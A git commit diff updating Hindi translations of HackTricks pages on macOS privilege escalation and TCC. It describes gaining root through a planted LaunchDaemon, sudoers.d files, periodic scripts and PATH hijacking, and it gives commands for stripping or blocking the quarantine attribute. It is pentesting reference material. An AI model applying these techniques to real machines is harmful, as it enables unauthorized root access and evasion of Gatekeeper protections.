Translated ['macos-hardening/macos-security-and-privilege-escalation/mac

This commit is contained in:
Translator 2023-12-27 02:04:54 +00:00
parent d888350778
commit fed2cb0de9
2 changed files with 156 additions and 110 deletions

View file

@ -4,11 +4,11 @@
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
* क्या आप किसी **साइबर सुरक्षा कंपनी** में काम करते हैं? क्या आप अपनी **कंपनी को HackTricks में विज्ञापित** देखना चाहते हैं? या क्या आपको **PEASS के नवीनतम संस्करण या HackTricks को PDF में डाउनलोड करने का उपयोग** करने की आवश्यकता है? [**सदस्यता योजनाएं**](https://github.com/sponsors/carlospolop) की जांच करें!
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family) की खोज करें, हमारा विशेष संग्रह [**NFTs**](https://opensea.io/collection/the-peass-family)
* [**आधिकारिक PEASS & HackTricks swag**](https://peass.creator-spring.com) प्राप्त करें
* [**💬**](https://emojipedia.org/speech-balloon/) [**Discord समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) में **शामिल हों** या मुझे **Twitter** पर **फ़ॉलो** करें [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks\_live)**.**
* **अपने हैकिंग ट्रिक्स को** [**hacktricks रेपो**](https://github.com/carlospolop/hacktricks) **और** [**hacktricks-cloud रेपो**](https://github.com/carlospolop/hacktricks-cloud) **में PR जमा करके अपनी ट्रिक्स साझा करें।**
* क्या आप **साइबर सुरक्षा कंपनी** में काम करते हैं? क्या आप चाहते हैं कि आपकी **कंपनी का विज्ञापन HackTricks में दिखाई दे**? या क्या आप **PEASS के नवीनतम संस्करण तक पहुँचना चाहते हैं या HackTricks को PDF में डाउनलोड करना चाहते हैं**? [**सब्सक्रिप्शन प्लान्स**](https://github.com/sponsors/carlospolop) देखें!
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family) की खोज करें, हमारा विशेष [**NFTs**](https://opensea.io/collection/the-peass-family) संग्रह
* [**आधिकारिक PEASS & HackTricks स्वैग**](https://peass.creator-spring.com) प्राप्त करें
* [**💬**](https://emojipedia.org/speech-balloon/) [**Discord समूह**](https://discord.gg/hRep4RUj7f) में **शामिल हों** या [**telegram समूह**](https://t.me/peass) या **Twitter पर** मुझे **फॉलो** करें [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks\_live)**.**
* **अपनी हैकिंग ट्रिक्स साझा करें, [**hacktricks repo**](https://github.com/carlospolop/hacktricks) और [**hacktricks-cloud repo**](https://github.com/carlospolop/hacktricks-cloud) में PRs सबमिट करके.**
</details>
@ -16,35 +16,37 @@
**डायरेक्टरी** में अनुमतियाँ:
* **पढ़ना** - आप डायरेक्टरी प्रविष्टियों को **गणना** कर सकते हैं
* **लिखना** - आप डायरेक्टरी में **फ़ाइलें हटा सकते/लिख सकते** हैं
* **चलाना** - आप डायरेक्टरी को **त्रावर्स** करने की अनुमति है - यदि आपके पास यह अधिकार नहीं है, तो आप उसमें कोई भी फ़ाइल या उप-डायरेक्टरी तक पहुंच नहीं पा सकते हैं।
* **read** - आप **डायरेक्टरी प्रविष्टियों** को **गिन** सकते हैं
* **write** - आप **फाइलों** को **हटा/लिख** सकते हैं और **खाली फोल्डर्स** को हटा सकते हैं।
* लेकिन आप **गैर-खाली फोल्डर्स को हटा/संशोधित नहीं कर सकते** जब तक कि आपके पास उस पर लिखने की अनुमति न हो।
* आप **फोल्डर का नाम संशोधित नहीं कर सकते** जब तक कि आप उसके मालिक न हों।
* **execute** - आपको **डायरेक्टरी से गुजरने की अनुमति है** - अगर आपके पास यह अधिकार नहीं है, तो आप उसके अंदर की किसी भी फाइल या किसी उप-डायरेक्टरी की फाइलों तक पहुँच नहीं सकते।
### खतरनाक संयोजन
**कैसे एक फ़ाइल/फ़ोल्डर को ओवरराइट करें**, लेकिन:
**रूट के स्वामित्व वाली फाइल/फोल्डर को कैसे ओवरराइट करें**, लेकिन:
* पथ में एक माता-पिता **डायरेक्टरी मालिक** उपयोगकर्ता है
* पथ में एक माता-पिता **डायरेक्टरी मालिक** उपयोगकर्ता समूह है जिसके **लिखने का अधिकार** है
* एक उपयोगकर्ता के **समूह** को **लिखने** की **अनुमति** है **फ़ाइल** के लिए
* पथ में एक माता-पिता **डायरेक्टरी मालिक** एक **उपयोगकर्ता समूह** है जिसके पास **लिखने की पहुँच** है
* एक उपयोगकर्ता **समूह** के पास **फाइल** पर **लिखने की पहुँच** है
पिछले किसी भी संयोजन के साथ, एक हमलावर्धक एक उच्चाधिकारिता अनिश्चित लिखने प्राप्त करने के लिए उम्मीदित पथ पर एक **सिम/हार्ड लिंक** डाल सकता है
पिछले किसी भी संयोजन के साथ, एक हमलावर **सिम/हार्ड लिंक** को अपेक्षित पथ पर **इंजेक्ट** कर सकता है ताकि विशेषाधिकार प्राप्त मनमानी लेखन प्राप्त कर सके
### फोल्डर रूट R+X विशेष मामला
### फोल्डर रूट R+X विशेष मामला
यदि किसी **डायरेक्टरी** में फ़ाइलें हैं जहां **केवल रूट को R+X एक्सेस** है, तो वे **किसी और के लिए अनुपयोगी होती हैं**। इसलिए, यदि किसी विकर्षण को अनुमति देने वाली कमजोरी के कारण एक उपयोगकर्ता द्वारा पढ़ने योग्य एक फ़ाइल को इस फ़ोल्डर से एक अलग फ़ोल्डर में **ले जाने** की अनुमति होती है, तो इसका दुरुपयोग करके इन फ़ाइलों को पढ़ा जा सकता है।
अगर किसी **डायरेक्टरी** में फाइलें हैं जहाँ **केवल रूट के पास R+X पहुँच** है, तो वे **किसी और के लिए सुलभ नहीं हैं**। इसलिए एक भेद्यता जो **उपयोगकर्ता द्वारा पढ़ी जा सकने वाली फाइल को हिलाने की अनुमति देती है**, जिसे उस **प्रतिबंध** के कारण पढ़ा नहीं जा सकता, उस फोल्डर से **एक अलग फोल्डर में**, उन फाइलों को पढ़ने के लिए दुरुपयोग किया जा सकता है।
उदाहरण: [https://theevilbit.github.io/posts/exploiting\_directory\_permissions\_on\_macos/#nix-directory-permissions](https://theevilbit.github.io/posts/exploiting\_directory\_permissions\_on\_macos/#nix-directory-permissions)
## सिम्बलिक लिंक / हार्ड लिंक
## सिम्बलिक लिंक / हार्ड लिंक
यदि एक उच्चाधिकारिता प्रक्रिया एक **फ़ाइल** में डेटा लिख रही है जिसे एक **निम्नाधिकारिता उपयोगकर्ता** द्वारा **नियंत्रित** किया जा सकता है, या जिसे पहले से ही एक निम्नाधिकारिता उपयोगकर्ता द्वारा **बनाया जा सकता है**। उपयोगकर्ता बस एक सिम्बॉलिक या हार्ड लिंक के माध्यम से इसे दूसरी फ़ाइल पर **पॉइंट** कर सकता है, और उच्चाधिकारिता प्रक्रिया उस फ़ाइल पर लिखेगी।
अगर कोई विशेषाधिकार प्राप्त प्रक्रिया **फाइल** में डेटा लिख रही है जिसे **निम्न विशेषाधिकार वाले उपयोगकर्ता द्वारा नियंत्रित** किया जा सकता है, या जो **पहले से निम्न विशेषाधिकार वाले उपयोगकर्ता द्वारा बनाई गई** हो सकती है। उपयोगकर्ता बस उसे एक सिम्बोलिक या हार्ड लिंक के माध्यम से **दूसरी फाइल की ओर इशारा कर सकता है**, और विशेषाधिकार प्राप्त प्रक्रिया उस फाइल पर लिखेगी।
हमलावर्धक एक अनिश्चित लिखने का दुरुपयोग करने के लिए हमलावर्धक कौशल को कहां देखें
अन्य अनुभागों में जांचें जहाँ एक हमलावर **मनमानी लेखन का दुरुपयोग करके विशेषाधिकार बढ़ा सकता है**
## .fileloc
**`.fileloc`** एक्सटेंशन वाली फाइलें अन्य एप्लिकेशन या बाइनरी को पॉइंट कर सकती हैं, ताकि जब वे खोले जाएं, ऐप्लिकेशन/बाइनरी वही चलाया जाएगा।\
**`.fileloc`** एक्सटेंशन वाली फाइलें अन्य एप्लिकेशनों या बाइनरीज़ की ओर इशारा कर सकती हैं ताकि जब वे खुलें, तो एप्लिकेशन/बाइनरी वही होगी जो निष्पादित की जाएगी।\
उदाहरण:
```xml
<?xml version="1.0" encoding="UTF-8"?>
@ -58,21 +60,21 @@
</dict>
</plist>
```
## अनियमित एफडी
## मनमाना FD
यदि आप किसी **प्रक्रिया को उच्च विशेषाधिकारों के साथ एक फ़ाइल या फ़ोल्डर खोलने के लिए मजबूर कर सकते हैं**, तो आप **`crontab`** का दुरुपयोग करके `/etc/sudoers.d` में एक फ़ाइल को **`EDITOR=exploit.py`** के साथ खोल सकते हैं, इस प्रकार `exploit.py` `/etc/sudoers` के भीतर फ़ाइल को प्राप्त करेगा और इसका दुरुपयोग करेगा
यदि आप किसी **प्रक्रिया को उच्च विशेषाधिकारों वाली फ़ाइल या फ़ोल्डर खोलने के लिए प्रेरित कर सकते हैं**, तो आप **`crontab`** का दुरुपयोग करके `/etc/sudoers.d` में एक फ़ाइल को **`EDITOR=exploit.py`** के साथ खोल सकते हैं, ताकि `exploit.py` को `/etc/sudoers` के अंदर फ़ाइल के लिए FD मिल जाए और इसका दुरुपयोग कर सके।
उदाहरण के लिए: [https://youtu.be/f1HA5QhLQ7Y?t=21098](https://youtu.be/f1HA5QhLQ7Y?t=21098)
## क्वारंटाइन xattrs चालाकियों से बचें
## क्वारंटाइन xattrs चालों से बचें
### इसे हटाएँ
### इसे हटा दें
```bash
xattr -d com.apple.quarantine /path/to/file_or_app
```
### uchg / uchange / uimmutable फ्लैग
### uchg / uchange / uimmutable ध्वज
यदि किसी फ़ाइल / फ़ोल्डर में यह अविचलनीय गुण होता है, तो उस पर xattr नहीं लगाया जा सकता है।
यदि किसी फ़ाइल/फ़ोल्डर में यह अचल गुण है तो उस पर xattr लगाना संभव नहीं होगा
```bash
echo asd > /tmp/asd
chflags uchg /tmp/asd # "chflags uchange /tmp/asd" or "chflags uimmutable /tmp/asd"
@ -84,7 +86,7 @@ ls -lO /tmp/asd
```
### defvfs माउंट
**devfs** माउंट **xattr का समर्थन नहीं करता**, अधिक जानकारी [**CVE-2023-32364**](https://gergelykalman.com/CVE-2023-32364-a-macOS-sandbox-escape-by-mounting.html) ें।
एक **devfs** माउंट **xattr का समर्थन नहीं करता है**, अधिक जानकारी के लिए [**CVE-2023-32364**](https://gergelykalman.com/CVE-2023-32364-a-macOS-sandbox-escape-by-mounting.html) देखें।
```bash
mkdir /tmp/mnt
mount_devfs -o noowners none "/tmp/mnt"
@ -93,9 +95,9 @@ mkdir /tmp/mnt/lol
xattr -w com.apple.quarantine "" /tmp/mnt/lol
xattr: [Errno 1] Operation not permitted: '/tmp/mnt/lol'
```
### लिखेंएक्सट्रेक्ट्रेस एसीएल
### writeextattr ACL
यह एसीएल फ़ाइल में `xattrs` को जोड़ने से रोकता है।
यह ACL फाइल में `xattrs` जोड़ने से रोकता है
```bash
rm -rf /tmp/test*
echo test >/tmp/test
@ -118,13 +120,13 @@ ls -le /tmp/test
```
### **com.apple.acl.text xattr + AppleDouble**
**AppleDouble** फ़ाइल प्रारूप एक फ़ाइल की ACEs के साथ एक फ़ाइल की प्रतिलिपि बनाता है।
**AppleDouble** फ़ाइल प्रारूप एक फ़ाइल की प्रतिलिपि उसके ACEs सहित बनाता है।
[**स्रोत कोड**](https://opensource.apple.com/source/Libc/Libc-391/darwin/copyfile.c.auto.html) में देखा जा सकता है कि xattr के भीतर संग्रहित **`com.apple.acl.text`** नामक ACL पाठ प्रतिष्ठान को डिकंप्रेस की गई फ़ाइल में ACL के रूप में सेट किया जाएगा। इसलिए, यदि आपने एक ऐप्लिकेशन को एक zip फ़ाइल में AppleDouble फ़ाइल प्रारूप के साथ संपीड़ित किया है जिसमें एक ACL है जो अन्य xattr को इसमें लिखने से रोकता है... तो quarantine xattr को ऐप्लिकेशन में सेट नहीं किया गया था:
[**सोर्स कोड**](https://opensource.apple.com/source/Libc/Libc-391/darwin/copyfile.c.auto.html) में यह देखा जा सकता है कि xattr के अंदर संग्रहीत ACL पाठ प्रतिनिधित्व **`com.apple.acl.text`** को डिकंप्रेस्ड फ़ाइल में ACL के रूप में सेट किया जाएगा। इसलिए, यदि आपने एक एप्लिकेशन को **AppleDouble** फ़ाइल प्रारूप में एक zip फ़ाइल में संपीड़ित किया है जिसमें एक ACL है जो अन्य xattrs को उस पर लिखने से रोकता है... तो एप्लिकेशन में quarantine xattr सेट नहीं किया गया था:
अधिक जानकारी के लिए [**मूल रिपोर्ट**](https://www.microsoft.com/en-us/security/blog/2022/12/19/gatekeepers-achilles-heel-unearthing-a-macos-vulnerability/) की जांच करें।
अधिक जानकारी के लिए [**मूल रिपोर्ट**](https://www.microsoft.com/en-us/security/blog/2022/12/19/gatekeepers-achilles-heel-unearthing-a-macos-vulnerability/) देखें।
इसे प्रतिरूपित करने के लिए, सबसे पहले हमें सही acl स्ट्रिंग प्राप्त करनी होगी:
इसे दोहराने के लिए हमें पहले सही acl स्ट्रिंग प्राप्त करने की आवश्यकता है:
```bash
# Everything will be happening here
mkdir /tmp/temp_xattrs
@ -144,17 +146,17 @@ ls -le test
```
(Note that even if this works the sandbox write the quarantine xattr before)
वास्तव में आवश्यक नहीं है लेकिन मैं इसे वहां छोड़ देता हूं बस इसके लिए:
यह वास्तव में आवश्यक नहीं है लेकिन मैं इसे यहाँ छोड़ देता हूँ, जस्ट इन केस:
{% content-ref url="macos-xattr-acls-extra-stuff.md" %}
[macos-xattr-acls-extra-stuff.md](macos-xattr-acls-extra-stuff.md)
{% endcontent-ref %}
## कोड साइनेचर को छोड़ें
## Bypass Code Signatures
बंडल में फ़ाइल **`_CodeSignature/CodeResources`** होती है जिसमें बंडल में हर एक **फ़ाइल** का **हैश** होता है। ध्यान दें कि CodeResources का हैश भी **executable में समाहित** होता है, इसलिए हम उसके साथ छेड़छाड़ नहीं कर सकते।
Bundles में **`_CodeSignature/CodeResources`** नामक फाइल होती है जिसमें **bundle** की प्रत्येक **फाइल** का **hash** होता है। ध्यान दें कि CodeResources का hash भी **executable** में **embedded** होता है, इसलिए हम उसके साथ भी छेड़छाड़ नहीं कर सकते।
हालांकि, कुछ ऐसी फ़ाइलें हैं जिनके साइनेचर की जांच नहीं की जाएगी, इनमें plist में तथा जैसे:
हालांकि, कुछ फाइलें होती हैं जिनके सिग्नेचर की जांच नहीं की जाती, इनमें plist में omit कीवर्ड होता है, जैसे:
```xml
<dict>
...
@ -198,7 +200,7 @@ ls -le test
...
</dict>
```
यह संभव है कि आप CLI से संसाधन के हस्ताक्षर की गणना कर सकते हैं:
संसाधन के हस्ताक्षर की गणना cli के साथ की जा सकती है:
{% code overflow="wrap" %}
```bash
@ -206,9 +208,9 @@ openssl dgst -binary -sha1 /System/Cryptexes/App/System/Applications/Safari.app/
```
{% endcode %}
## डीएमजी माउंट करें
## माउंट dmgs
एक उपयोगकर्ता एक कस्टम डीएमजी बना सकता है जो कि कुछ मौजूदा फ़ोल्डर्स के ऊपर बनाया जा सकता है। यहां आप कस्टम सामग्री के साथ एक कस्टम डीएमजी पैकेज कैसे बना सकते हैं:
एक उपयोगकर्ता कुछ मौजूदा फोल्डर्स के ऊपर भी एक कस्टम dmg बना सकता है। यह आप कैसे एक कस्टम dmg पैकेज कस्टम सामग्री के साथ बना सकते हैं:
{% code overflow="wrap" %}
```bash
@ -233,17 +235,17 @@ hdiutil create -srcfolder justsome.app justsome.dmg
```
{% endcode %}
## अनियमित लेखन
## मनमाने लेखन
### नियमित एसएच स्क्रिप्ट
### आवधिक sh स्क्रिप्ट्स
यदि आपका स्क्रिप्ट एक **शेल स्क्रिप्ट** के रूप में व्याख्या किया जा सकता है, तो आप **`/etc/periodic/daily/999.local`** शेल स्क्रिप्ट को अधिलेखित कर सकते हैं जो प्रतिदिन ट्रिगर होगा
यदि आपकी स्क्रिप्ट को **शेल स्क्रिप्ट** के रूप में व्याख्या किया जा सकता है, तो आप **`/etc/periodic/daily/999.local`** शेल स्क्रिप्ट को ओवरराइट कर सकते हैं जो हर दिन ट्रिगर की जाएगी
आप इस स्क्रिप्ट की नकल बना सकते हैं: **`sudo periodic daily`**
आप इस स्क्रिप्ट क**नकली** निष्पादन इसके साथ कर सकते हैं: **`sudo periodic daily`**
### डेमन
### डेमन्स
एक अनियमित **लॉन्चडेमन** जैसे **`/Library/LaunchDaemons/xyz.hacktricks.privesc.plist`** को लिखें, जिसमें एक प्लिस्ट एक अनियमित स्क्रिप्ट को निष्पादित करता है, जैसे:
मनमाने **LaunchDaemon** जैसे **`/Library/LaunchDaemons/xyz.hacktricks.privesc.plist`** को लिखें जिसमें एक plist एक मनमाने स्क्रिप्ट को निष्पादित करता है जैसे:
```xml
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE plist PUBLIC "-//Apple Computer//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
@ -260,17 +262,18 @@ hdiutil create -srcfolder justsome.app justsome.dmg
</dict>
</plist>
```
आपको रूट के रूप में चलाने के लिए चाहिए वही **कमांड** जो आप चाहें तो `/Applications/Scripts/privesc.sh` स्क्रिप्ट उत्पन्न करें।
```markdown
स्क्रिप्ट `/Applications/Scripts/privesc.sh` बनाएं जिसमें आप जो **कमांड्स** रूट के रूप में चलाना चाहते हैं, वो शामिल हों।
### Sudoers फ़ाइल
यदि आपके पास **अनियमित लेखन** है, तो आप `/etc/sudoers.d/` फ़ोल्डर के अंदर एक फ़ाइल बना सकते हैं जिससे आपको **sudo** अधिकार मिलें
यदि आपके पास **मनमानी लिखने की क्षमता** है, तो आप **`/etc/sudoers.d/`** फोल्डर के अंदर एक फ़ाइल बना सकते हैं जो आपको **sudo** विशेषाधिकार प्रदान करती है
### PATH फ़ाइलें
फ़ाइल **`/etc/paths`** PATH env चर को भरने वाली मुख्य जगहों में से एक है। इसे ओवरराइट करने के लिए आपको रूट होना चाहिए, लेकिन यदि कोई **विशेषाधिकारी प्रक्रिया** से कोई **पूरा पथ नहीं होने वाली कमांड** चला रही है, तो आप इस फ़ाइल को संशोधित करके इसे **हाइजैक** कर सकते हैं।
**`/etc/paths`** फ़ाइल PATH env वेरिएबल को पॉपुलेट करने वाले मुख्य स्थानों में से एक है। इसे ओवरराइट करने के लिए आपको रूट होना चाहिए, लेकिन यदि कोई **विशेषाधिकार प्राप्त प्रक्रिया** से स्क्रिप्ट किसी **कमांड को पूर्ण पथ के बिना** निष्पादित कर रही है, तो आप इस फ़ाइल को संशोधित करके उसे **हाइजैक** कर सकते हैं।
आप नए फ़ोल्डर को `PATH` env चर में लोड करने के लिए **`/etc/paths.d`** में भी फ़ाइलें लिख सकते हैं।
&#x20;आप **`/etc/paths.d`** में भी फ़ाइलें लिख सकते हैं ताकि `PATH` env वेरिएबल में नए फोल्डर्स लोड किए जा सकें।
## संदर्भ
@ -280,10 +283,11 @@ hdiutil create -srcfolder justsome.app justsome.dmg
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
* क्या आप **साइबर सुरक्षा कंपनी** में काम करते हैं? क्या आप अपनी कंपनी को **HackTricks में विज्ञापित** देखना चाहते हैं? या क्या आप **PEASS के नवीनतम संस्करण का उपयोग करना चाहते हैं या HackTricks को PDF में डाउनलोड करना चाहते हैं**? [**सदस्यता योजनाएं**](https://github.com/sponsors/carlospolop) की जांच करें!
* खोजें [**The PEASS Family**](https://opensea.io/collection/the-peass-family), हमारा विशेष [**NFT संग्रह**](https://opensea.io/collection/the-peass-family) का पता लगाएं
* प्राप्त करें [**आधिकारिक PEASS & HackTricks swag**](https://peass.creator-spring.com)
* **शामिल हों** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या मुझे **ट्विटर** पर **फ़ॉलो** करें [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks\_live)**.**
* **अपने हैकिंग ट्रिक्स साझा करें द्वारा PRs सबमिट करके** [**hacktricks repo**](https://github.com/carlospolop/hacktricks) **और** [**hacktricks-cloud repo**](https://github.com/carlospolop/hacktricks-cloud) **को।**
* क्या आप **साइबरसिक्योरिटी कंपनी** में काम करते हैं? क्या आप अपनी **कंपनी का विज्ञापन HackTricks में** देखना चाहते हैं? या क्या आप **PEASS के नवीनतम संस्करण तक पहुँच चाहते हैं या HackTricks को PDF में डाउनलोड करना चाहते हैं**? [**सब्सक्रिप्शन प्लान्स**](https://github.com/sponsors/carlospolop) देखें!
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family) की खोज करें, हमारा एक्सक्लूसिव [**NFTs**](https://opensea.io/collection/the-peass-family) का संग्रह।
* [**आधिकारिक PEASS & HackTricks स्वैग**](https://peass.creator-spring.com) प्राप्त करें।
* [**💬**](https://emojipedia.org/speech-balloon/) [**Discord समूह**](https://discord.gg/hRep4RUj7f) में शामिल हों या [**telegram समूह**](https://t.me/peass) में या **Twitter** पर मुझे **फॉलो** करें [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks\_live)****
* अपनी हैकिंग ट्रिक्स साझा करें, [**hacktricks repo**](https://github.com/carlospolop/hacktricks) और [**hacktricks-cloud repo**](https://github.com/carlospolop/hacktricks-cloud) में PRs सबमिट करके।
</details>
```

View file

@ -5,27 +5,27 @@
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
* क्या आप **cybersecurity company** में काम करते हैं? क्या आप चाहते हैं कि आपकी **कंपनी का विज्ञापन HackTricks में दिखाई दे**? या क्या आप **PEASS के नवीनतम संस्करण तक पहुँच चाहते हैं या HackTricks को PDF में डाउनलोड करना चाहते हैं**? [**सब्सक्रिप्शन प्लान्स**](https://github.com/sponsors/carlospolop) देखें!
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family) की खोज करें, हमारा एक्सक्लूसिव [**NFTs**](https://opensea.io/collection/the-peass-family) का संग्रह
* [**आधिकारिक PEASS & HackTricks स्वैग**](https://peass.creator-spring.com) प्राप्त करें
* **[**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) या [**telegram group**](https://t.me/peass) में शामिल हों** या **Twitter** पर मुझे **फॉलो** करें [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks\_live)**.**
* **hacktricks repo** और **hacktricks-cloud repo** में PRs सबमिट करके अपनी hacking tricks साझा करें
* क्या आप **cybersecurity company** में काम करते हैं? क्या आप चाहते हैं कि आपकी **company का विज्ञापन HackTricks में दिखाई दे**? या क्या आप **PEASS के नवीनतम संस्करण तक पहुँचना चाहते हैं या HackTricks को PDF में डाउनलोड करना चाहते हैं**? [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop) देखें!
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family) की खोज करें, हमारा विशेष [**NFTs**](https://opensea.io/collection/the-peass-family) संग्रह
* [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) प्राप्त करें
* **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) या [**telegram group**](https://t.me/peass) या **Twitter** पर मुझे **follow** करें [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks\_live)**.**
* **hacktricks repo** में PRs सबमिट करके अपनी hacking tricks साझा करें और [**hacktricks-cloud repo**](https://github.com/carlospolop/hacktricks-cloud).
</details>
## **मूल जानकारी**
**TCC (Transparency, Consent, and Control)** macOS में एक तंत्र है जो **विशेष सुविधाओं तक एप्लिकेशन की पहुँच को सीमित और नियंत्रित करता है**, आमतौर पर गोपनीयता के दृष्टिकोण से। इसमें लोकेशन सर्विसेज, संपर्क, फोटो, माइक्रोफोन, कैमरा, एक्सेसिबिलिटी, पूर्ण डिस्क एक्सेस और बहुत कुछ शामिल हो सकता है।
**TCC (Transparency, Consent, and Control)** macOS में एक तंत्र है जो **विशेष सुविधाओं तक एप्लिकेशन की पहुँच को सीमित और नियंत्रित करता है**, आमतौर पर गोपनीयता के दृष्टिकोण से। इसमें लोकेशन सेवाएं, संपर्क, फोटो, माइक्रोफोन, कैमरा, एक्सेसिबिलिटी, पूर्ण डिस्क एक्सेस और बहुत कुछ शामिल हो सकता है।
उपयोगकर्ता के दृष्टिकोण से, जब कोई एप्लिकेशन TCC द्वारा संरक्षित किसी सुविधा तक पहुँच चाहता है तो वे TCC को क्रिया में देखते हैं। जब ऐसा होता है तो **उपयोगकर्ता को एक संवाद बॉक्स प्रदर्शित होता है** जो उनसे पूछता है कि क्या वे पहुँच की अनुमति देना चाहते हैं या नहीं।
उपयोगकर्ता के दृष्टिकोण से, जब कोई एप्लिकेशन TCC द्वारा संरक्षित किसी सुविधा तक पहुँचना चाहता है तो वे TCC को क्रिया में देखते हैं। जब ऐसा होता है तो **उपयोगकर्ता को एक संवाद बॉक्स प्रदर्शित होता है** जो उनसे पूछता है कि क्या वे पहुँच की अनुमति देना चाहते हैं या नहीं।
यह भी संभव है कि **एप्लिकेशन्स को फाइलों तक पहुँच दी जाए** उपयोगकर्ताओं के **स्पष्ट इरादों** से, उदाहरण के लिए जब एक उपयोगकर्ता **एक फाइल को किसी प्रोग्राम में ड्रैग\&ड्रॉप करता है** (स्पष्ट है कि प्रोग्राम को इसकी पहुँच होनी चाहिए)।
यह भी संभव है कि **एप्लिकेशन को फाइलों तक पहुँच प्रान की जाए** उपयोगकर्ताओं द्वारा **स्पष्ट इरादों** के माध्यम से, उदाहरण के लिए जब एक उपयोगकर्ता **एक फाइल को किसी प्रोग्राम में खींचकर छोड़ता है** (स्पष्ट रूप से प्रोग्राम को इसकी पहुँच होनी चाहिए)।
![TCC प्रॉम्प्ट का एक उदाहरण](https://rainforest.engineering/images/posts/macos-tcc/tcc-prompt.png?1620047855)
![TCC के एक प्रॉम्प्ट का उदाहरण](https://rainforest.engineering/images/posts/macos-tcc/tcc-prompt.png?1620047855)
**TCC** `/System/Library/PrivateFrameworks/TCC.framework/Support/tccd` में स्थित **daemon** द्वारा संभाला जाता है और `/System/Library/LaunchDaemons/com.apple.tccd.system.plist` में कॉन्फ़िगर किया गया है (mach service `com.apple.tccd.system` को रजिस्टर करता है)।
एक **user-mode tccd** होता है जो प्रत्येक लॉग इन किए गए उपयोगकर्ता के लिए `/System/Library/LaunchAgents/com.apple.tccd.plist` में परिभाषित होता है जो mach services `com.apple.tccd` और `com.apple.usernotifications.delegate.com.apple.tccd` को रजिस्टर करता है।
एक **user-mode tccd** होता है जो प्रत्येक लॉग इन किए गए उपयोगकर्ता के लिए `/System/Library/LaunchAgents/com.apple.tccd.plist` में परिभाषित होता है, जो mach services `com.apple.tccd` और `com.apple.usernotifications.delegate.com.apple.tccd` को रजिस्टर करता है।
यहाँ आप system और user के रूप में चल रहे tccd को देख सकते हैं:
```
@ -34,27 +34,27 @@ ps -ef | grep tcc
0 374 1 0 Thu07PM ?? 2:01.66 /System/Library/PrivateFrameworks/TCC.framework/Support/tccd system
501 63079 1 0 6:59PM ?? 0:01.95 /System/Library/PrivateFrameworks/TCC.framework/Support/tccd
```
अनुमतियाँ **मूल एप्लिकेशन से विरासत में मिली होती हैं** और अनुमतियाँ **बंडल ID** और **डेवलपर ID** के आधार पर **ट्रैक की जाती हैं**
अनुमतियाँ **मूल एप्लिकेशन से विरासत में मिली होती हैं** और अनुमतियाँ **बंडल आईडी** और **डेवलपर आईडी** के आधार पर **ट्रैक की जाती हैं**
### TCC डेटाबेस
अनुमतियाँ/अस्वीकृतियाँ फिर कुछ TCC डेटाबेस में संग्रहीत की जाती हैं:
* सिस्टम-व्यापी डेटाबेस **`/Library/Application Support/com.apple.TCC/TCC.db`** में।
* सिस्टम-व्यापी डेटाबेस **`/Library/Application Support/com.apple.TCC/TCC.db`** में होता है
* यह डेटाबेस **SIP संरक्षित** है, इसलिए केवल SIP बायपास ही इसमें लिख सकता है।
* प्रति-उपयोगकर्ता प्राथमिकताओं के लिए उपयोगकर्ता TCC डेटाबेस **`$HOME/Library/Application Support/com.apple.TCC/TCC.db`**।
